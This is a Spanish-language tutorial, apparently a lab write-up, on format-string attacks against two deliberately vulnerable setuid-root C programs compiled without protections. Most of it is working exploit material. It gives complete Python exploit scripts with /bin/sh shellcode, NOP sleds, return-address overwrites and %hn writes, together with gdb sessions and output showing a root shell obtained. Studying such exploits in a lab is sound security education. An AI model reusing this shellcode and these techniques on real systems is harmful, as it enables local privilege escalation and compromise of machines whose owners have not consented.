Ataque Format String

Análisis del programa vulnerable

Fs 1

int main(int argv,char **argc) {
	short int zero=0;
	int *plen=(int*)malloc(sizeof(int));
	char buf[256];

	strcpy(buf,argc[1]);
	printf("%s%hn\n",buf,plen);
	while(zero);
}

¿Qué hace el programa?

El programa vulnerable copia en buf el primer parámetro ingresado por el usuario. Imprime por salida estándar el contenido de buf y guarda en plen la cantidad de bytes impresos. Si la variable zero se mantiene intacta el loop while(zero) no se ejecuta y el proceso finaliza.

user@abos:~$ gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o fs1 fs1.c
user@abos:~$ sudo chown root ./fs1; sudo chmod u+s ./fs1                      ; root owner & setuid

user@abos:~$ ./fs1 AAAAA
AAAAA
user@abos:~$ ./fs1 BBBBBBB
BBBBBBB

¿Cuál es la dificultad principal?

pila

Layout de la pila antes del exploit:

[ebp-264]  = buf
[ebp-8]    = plen
[ebp-4]    = zero
[ebp]      = ebp anterior
[ebp+4]    = dirección de retorno

pila

Ataque Format String:

La reescritura de la dirección de retorno de main a través de un desbodamiento de búfer -en la función strcpy- obliga a sobreescribir la variable zero (por su ubicación en la pila entre buf y la dirección de retorno). Para que el ataque funcione es necesario que main retorne y por ende que zero continúe siendo 0.

pila

Consideraciones: no es plausible como solución sobreescribir zero con el valor numérico de 0000. Como el desbordamiento de bufer se logra a través strcpy, una función que manipula strings, si optamos por escribir en zero el string “0000” estaríamos almacenando en zero el código ascii: 0x30303030. Y por ende no lograríamos el objetivo de que el programa retorne.

Para solucionar este escollo es necesario combinar el ataque de desbordamiento de búfer con un ataque del tipo format string.
Este ataque tomará dos pasos. Primero, aprovechar strcpy(buf,argc[1]) para inyectar el shellcode y sobreescribir la dirección de retorno de main() almacenada en la pila para que apunte a él. Y en un segundo paso, aprovechamos printf("%s%hn\n",buf,plen) para volver a zero = 0 de manera indirecta a través de plen, gracias a una vulnerabilidad del tipo format string. Paso a paso la estrategia será la siguiente:

Primera parte: aprovechando el código strcpy(buf,argc[1]):

Segunda parte: aprovechando printf("%s%hn\n",buf,plen):

Para lograrlo llevamos a cabo los siguientes pasos.

  1. Identificamos la dirección de buf en gdb

    Consideraciones: como el argumento que le vamos a pasar a strcpy se almacena en la pila, su longitud afecta el cálculo de la dirección de buf. En este caso sabemos que la longitud total del argumento (es decir la cantidad de caracteres que va a imprimir printf) debe ser de 0x(1)0000 que en decimal es 65536.
    Por eso para conocer la dirección que tendrá buf debugeamos el programa con un argumento cualquiera pero de esa longitud.

    Armamos un archivo en Python para ingresar el input: exploit.py

    #! /usr/bin/env python
       
    import sys
       
    exploit = "A" * 65536                   # 0x1000 == 65536
       
    sys.stdout.write(exploit)
    

    Y ejecutamos el programa vulnerable con ese argumento para conocer la dirección de buf:

    $ ../r.sh gdb ./fs1
    GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1
    (gdb) break main
    (gdb) r "$(./exploit.py)"
    (gdb) break 6
    (gdb) c
    Continuing.
       
    Breakpoint 2, main (argv=3, argc=0xbffff814) at fs1.c:6
    6   strcpy(buf,argc[1]);
       
    (gdb) x/wx buf
    0xbffef680: 0x00000000
    

    La dirección de buf es entonces 0xbffef680.

  2. Planificamos el argumento de entrada

    • Inyectamos el shellcode en buf.
    • Hacemos que plen apunte a zero.
    • Escribimos basura en zero (porque vamos a pisar su valor).
    • Incluimos una dirección válida cualquiera en ebp.
    • Sobreescribimos la dirección de retorno para que apunte al shellcode.
    • Extendemos longitud del input para imprimir un total de (1)0000 bytes, cantidad almacenada en plen (que apuntará a zero).

pila

  1. Con eso en mente editamos el archivo en Python con el argumento definitivo: exploit.py

    #! /usr/bin/env python
       
    import sys
    from struct import pack
       
    #pwn a shell
    shellcode  = "\xeb\x1e\x31\xc0\x5b\x88\x43\x07\x89\x5b\x08"
    shellcode += "\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\x31\xd2"
    shellcode += "\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8"
    shellcode += "\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
    shellcode += "\x41\x42\x42\x42\x42\x43\x43\x43\x43"
       
    buf_size = 256
       
    buf_addr  = 0xbffef680
    zero_addr = buf_addr + buf_size + 4 + 2         #addr zero (4 bytes: int plen; 2 bytes: short int zero)
       
    exploit  = "\x90" * 80                          #nop sled
    exploit += shellcode                            #shellcode
    exploit += "\x42" * (256-80-len(shellcode))     #fill buf
    #total: 256 bytes
       
    exploit += pack("<I", zero_addr)                #plen -> &zero
    exploit += "AAAA"                               #basura en zero
    exploit += pack("<I", buf_addr)                 #basura -addr existente- en ebp
    exploit += pack("<I", buf_addr)                 #ret addr -> &shellcode
    #total: 16 bytes
    
    exploit += "B" * (65536-256-16)                 #%hn contabiliza 0x10000 o 65536 bytes (*plen = 0000)
    
    sys.stdout.write(exploit)
    
  2. Ejecutamos el exploit

    user@abos:~$ ../r.sh ./fs1 "$(./exploit.py)"
    
    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    # whoami
    root
    # id
    uid=1001(user) gid=1001(user) euid=0(root) groups=1001(user),27(sudo)
    # 
    

Layout de la pila después del exploit:

Gráficamente logramos el siguiente resultado:

pila después

…………………………………………………………………………………………………………………………………………………

FS2

Código fuente

int main(int argv,char **argc) {
        char buf[256];

        snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]);
        snprintf(buf,sizeof buf,"%s%c%c%hn",argc[2]);
}

¿Qué hace el programa?

El programa vulnerable espera dos argumentos de entrada. Copia en buf el primer argumento ingresado por el usuario. El format string de snprintf indica que espera un puntero a un string, dos valores del tipo caracter y otro puntero a dónde se va a guardar la cantidad de bytes impresos (número almacenado en dos bytes). Se reiteran estos pasos con el segundo argumento ingresado.

¿Cuál es la dificultad principal?

Layout de la pila antes del exploit:

Estado de la pila antes de ejecutar el primer snprintf:

      int main(int argv,char **argc) {
        char buf[256];

eip =>  snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]);
        snprintf(buf,sizeof buf,"%s%c%c%hn",argc[2]);
     }

pila-1

Con el primer call a snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]) se apilan sus parámetros de la siguiente manera:

pila-2

El gráfico del estado de la pila al hacer el llamado a snprintf muestra cómo esa función de formato obtiene de la pila los parámetros de formato "%s%c%c%hn". ese es el contenido que almacena en buf.

Ataque Format String

Particularidad de la función snprintf():

La función snprintf(char *buf, size_t size, const char *format, ...) almacena en buf sólo el tamaño indicado por size. En este caso snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]) escribe en buf 256 bytes que es el tamaño de buf que se pasa como parámetro. Independientemente de eso, el parámetro de formato %hn escribe en una dirección dada la cantidad total de bytes impresos pudiendo ser mayor que el tamaño de buf.
Por ejemplo, si tuviesemos una llamada snprintf(buf, 256, "%s%n", &txt, &num_caracteres) y sabemos que len(txt) es 1024. Aunque en buf se copien 256 bytes (el size que se le pasa por parámetro), en num_caracteres se va a escribir el número 1024, es decir el total de bytes impresos.
Esto permite aprovecharnos del format string para lograr una escritura arbitraria manipulando la cantidad total de caracteres impresos, sin importar la restricción del tamaño de buf.

Aprovechando esa peculiaridad vamos a sobreesribir la dirección de retorno de main almacenada en la pila para que apunte al shellcode.
Al igual que antes este ataque toma dos partes:

Primera parte: con snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]) inyectamos el shellcode en buf y -manipulando el total de bytes impresos- aprovechamos el parámetro %hn para sobreescribir los dos primeros bytes de la dirección de retorno de main con parte de la dirección de buf.

Segunda parte: con snprintf(buf,sizeof buf,"%s%c%c%hn",argc[2]) aprovechando también %hn sobrescribimos los otros dos bytes de la dirección de retorno.

Para lograrlo llevamos a cabo los siguientes pasos.

  1. Planificamos los argumentos de main()
    • Inyectamos el shellcode en buf
    • Usamos el parámetro %hn para sobreescribir en la dirección de retorno de main
    • Para ello extendemos la longitud del input para que la cantidad de caracteres impresos por snprintf sea igual a la dirección de buf.
      Así logramos sobreescribir la dirección de retorno para que apunte a buf.

    pila

    Consideraciones:
    - Fallo en tobogán de NOPs: con esta estrategia el tobogán de NOPs que debe desembocar en el shellcode, se detiene erróneamente en la dirección de retorno apilada al comienzo de buf (en el gŕafico &ret_addr). Esa dirección de retorno es importante ya que le indica al parámetro %hn dónde escribir.
    Es necesaria una modificación para que los primeros bytes de buf hagan un jump que se saltee esa dirección de retorno y siga por el tobogán de NOPs hasta el shellcode. Para eso se incluye al principio de buf el código \xeb\x0a que es el código máquina de la instrucción jmp 0xc. De manera que al retornar main se desemboca en buf, se hace un salto de 12 bytes y se cae en el tobogán de NOPs que finalmente desembocan en el shellcode.

    Entonces para incluir el jump que evite el fallo en el tobogán de NOPs, el layout de pila deseado es:

    pila

  2. Identificamos la dirección de buf
    Para averiguar la dirección de buf es necesario volver a tener en cuenta la cuestión del padding. En casos como: printf("%s",argc[1]) al string de entrada se lo pasamos como un argumento y por ende se almacena en la pila. Sumar un byte al final del string modifica los offsets en la pila y complejiza el cálculo de direcciones de memoria.

    Pasando siempre argumentos de igual longitud fijamos los offsets de la pila. Para eso llamamos al programa con un argumento extra que funciona como “padding” y es relativo a la longitud del resto de los argumentos. Así logramos consistencia en las direcciones de memoria sin importar que modifiquemos los bytes de longitud del/los string/s de entrada.
    Creamos el archivo exploit.py para probar el padding:

    #! /usr/bin/env python
    import sys
    
    exploit= "BBBB"                   ; acá puede ir cualquier cosa
       
    padding = "A" * (100000 - len(exploit))
       
    if sys.argv[1] == "1":
      sys.stdout.write(exploit)
    elif sys.argv[1] == "2":
      sys.stdout.write(padding)
    

    Y averiguamos la dirección de buf pasándole ambos argumentos:

    user@abos:~$  ./r.sh gdb ./fs2 "$(./exploit.py 1)" "$(./exploit.py 2)"
    (gdb) break main
    (gdb) r "$(./exploit.py 1)" "$(./exploit.py 2)"
    Breakpoint 1, main (argv=3, argc=0xbffe7154) at fs2.c:7
    7         snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]);
    (gdb) x/wx buf
    0xbffe6fb8: 0x00000001
    

    Como siempre vamos a usar el mismo padding, es decir los argumentos van a tener siempre la misma longitud aunque editemos el bytecode del exploit, podemos estar seguros de que la dirección de buf en el exploit definitivo va a ser también 0xbffe6fb8.

  3. Editamos el archivo exploit.py para pasar ambos inputs.
    Como dijimos nos cuidamos de incluir el jump para evitar que se interrumpa el tobogán de NOPs antes de llegar al shellcode.
    Y recordemos que sólo podemos sobreescribir la dirección de retorno de a dos bytes. Es por ello que al incluirla en el exploit la desglosamos en los dos bytes menos significativos de esa dirección (ret_addr_low) y los dos bytes más significativos ( ret_addr_high). Lo mismo sucede con la dirección de buf que vamos a escribir allí, con el primer input escribirmos la parte menos significativa de esa dirección (buf_addr_low) y con el segundo input escribimos los dos bytes más significativos (buf_addr_high).

    #! /usr/bin/env python
       
    """Uso: ./fs2 "$(./exploit.py 1)" "$(./exploit.py 2)" "$(./exploit.py 3)" """
    
    import sys
       
    from struct import pack
       
    shellcode  = "\xeb\x1e\x31\xc0\x5b\x88\x43\x07\x89\x5b\x08\x89\x43\x0c"
    shellcode += "\x8d\x4b\x08\x8d\x53\x0c\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"
    shellcode += "\x31\xdb\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    shellcode += "\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
       
    buf_size = 256
       
    buf_addr     = 0xbffe6fb8                              
       
    buf_addr_low  = (buf_addr >>  0) & 0x0000ffff
    buf_addr_high = (buf_addr >> 16) & 0x0000ffff
       
    ret_addr_low  = buf_addr + buf_size + 4 + 0
    ret_addr_high = buf_addr + buf_size + 4 + 2
       
       
    exploit_argv1  = "\xeb\x0a" + "\x90" * 2              # \xeb\x0a == jmp 0xc
    exploit_argv1 += "\x90" * 4
    exploit_argv1 += pack("<I", ret_addr_high)
    exploit_argv1 += "\x90" * 40
    exploit_argv1 += shellcode
    exploit_argv1 += "A" * (buf_addr_high - len(exploit_argv1) - 2)
       
    exploit_argv2  = "\xeb\x0a" + "\x90" * 2              # \xeb\x0a == jmp 0xc
    exploit_argv2 += "\x90" * 4
    exploit_argv2 += pack("<I", ret_addr_low)
    exploit_argv2 += "\x90" * 40
    exploit_argv2 += shellcode
    exploit_argv2 += "A" * (buf_addr_low - len(exploit_argv2) - 2)
       
    padding = "A" * (100000 - len(exploit_argv1) - len(exploit_argv2) - 2)
       
       
    if sys.argv[1] == "1":
            sys.stdout.write(exploit_argv1)
    elif sys.argv[1] == "2":
            sys.stdout.write(exploit_argv2)
    elif sys.argv[1] == "3":
            sys.stdout.write(padding)
    
  4. Ejecutamos el exploit
    user@abos:~$ ./fs2 "$(./exploit.py 1)" "$(./exploit.py 2)" "$(./exploit.py 3)"
       
    process 1537 is executing new program: /bin/dash
    $ 
    

Layout de la pila después del exploit:

Gráficamente logramos el siguiente resultado:

pila-3

¿Cómo seguir?

  1. Format String 3: lograr el ataque con una única escritura en buf de 2 bytes.
Código fuente
int main(int argv,char **argc) {
        char buf[256];

        snprintf(buf,sizeof buf,"%s%c%c%hn",argc[1]);
}